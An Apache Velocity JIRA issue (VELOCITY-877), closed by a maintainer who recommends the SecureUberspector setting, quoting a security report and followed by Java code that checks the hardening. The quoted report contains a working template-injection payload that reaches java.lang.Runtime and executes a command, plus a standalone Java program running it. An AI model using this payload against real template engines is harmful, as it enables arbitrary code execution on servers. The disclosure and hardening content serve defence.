[ https://issues.apache.org/jira/browse/VELOCITY-877?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Sergiu Dumitriu closed VELOCITY-877.
------------------------------------

    Resolution: Not A Problem
      Assignee: Sergiu Dumitriu

Yes, this is by design, **if** you are using the default uberspector. Velocity also comes with a secure uberspector, which is designed to prevent exactly this kind of security issue.

{noformat}
runtime.introspector.uberspect = org.apache.velocity.util.introspection.SecureUberspector
{noformat}

> Access to critical fields/methods allows execution of arbitrary code ('Template Injection')
> -------------------------------------------------------------------------------------------
>
>                 Key: VELOCITY-877
>                 URL: https://issues.apache.org/jira/browse/VELOCITY-877
>             Project: Velocity
>          Issue Type: Bug
>          Components: Engine
>    Affects Versions: 1.7
>            Reporter: Markus Wulftange
>            Assignee: Sergiu Dumitriu
>            Priority: Critical
>              Labels: security
>
> It is possible to reference certain fields/methods, which eventually allow the execution of arbitrary methods.
> For example, by utilizing the '{{class}}' field or '{{getClass()}}' method of any variable, it is possible to get the variable's class object. This can be extended to get arbitrary class objects and execute arbitrary methods.
> For example, the following statement results in the execution of the '{{xterm}}':
> {code}
> $var.class.class.forName('java.lang.Runtime').getRuntime().exec('xterm').waitFor()
> {code}
> As a standalone:
> {code:java}
> import org.apache.velocity.VelocityContext;
> import org.apache.velocity.app.Velocity;
> import org.apache.velocity.context.Context;
>
> public class VelocityTest {
>     public static void main(String[] args) {
>         Context context = new VelocityContext();
>         context.put("var", "foo");
>         String instring =
>             "$var.class.class.forName('java.lang.Runtime').getRuntime().exec('xterm').waitFor()";
>         Velocity.evaluate(context, null, "templateName", instring);
>     }
> }
> {code}
> This issue has already been made public in the past by James Kettle in August 2015 (see http://blog.portswigger.net/2015/08/server-side-template-injection.html#Velocity) and via CVE-2015-5603 (see https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5603) and possibly others.

--
This message was sent by Atlassian JIRA
(v6.3.4#6332)

---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscr...@velocity.apache.org
For additional commands, e-mail: dev-h...@velocity.apache.org
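A way to verify that the `runtime.introspector.uberspect` setting from the comment above actually closes the introspection path the report relies on, as an added example that is not code from the issue or from the Velocity project. It assumes Velocity 1.7 on the classpath; the probe template only walks the first two hops of the reported chain (`$var.class.class`) and invokes no method, and the class and method names `SecureUberspectorCheck`, `render` and `probeBlocked` are my own.

```java
import java.io.StringWriter;
import java.util.Properties;

import org.apache.velocity.VelocityContext;
import org.apache.velocity.app.VelocityEngine;
import org.apache.velocity.context.Context;

/**
 * Added example (not from the issue): renders a probe with and without the
 * SecureUberspector so a deployment can check the hardening is in effect.
 */
public class SecureUberspectorCheck {

    /** Benign probe: reaches java.lang.Class via a String's getClass(), nothing more. */
    static final String PROBE = "$var.class.class";

    static String render(String template, boolean secure) {
        Properties props = new Properties();
        if (secure) {
            // The setting Sergiu names above; the class is Velocity's own SecureUberspector.
            props.setProperty("runtime.introspector.uberspect",
                    "org.apache.velocity.util.introspection.SecureUberspector");
        }
        VelocityEngine engine = new VelocityEngine();
        engine.init(props);

        Context ctx = new VelocityContext();
        ctx.put("var", "foo");          // any String value serves as the starting object

        StringWriter out = new StringWriter();
        engine.evaluate(ctx, out, "uberspect-check", template);
        return out.toString();
    }

    /**
     * True when the engine left the probe unresolved and echoed it literally,
     * which is what SecureUberspector does once the chain reaches java.lang.Class
     * (a class on its default restricted list). With the default uberspector the
     * probe resolves and the rendered text no longer contains the reference.
     */
    static boolean probeBlocked(boolean secure) {
        return render(PROBE, secure).contains("$var.class");
    }

    public static void main(String[] args) {
        System.out.println("default uberspector blocks probe: " + probeBlocked(false));
        System.out.println("SecureUberspector blocks probe:   " + probeBlocked(true));
    }
}
```

SecureUberspector still allows `Class.getName()`, so a template such as `$var.class.name` keeps working under the hardened setting; only the hops into restricted classes and packages are refused, and each refusal is logged as a warning by the engine.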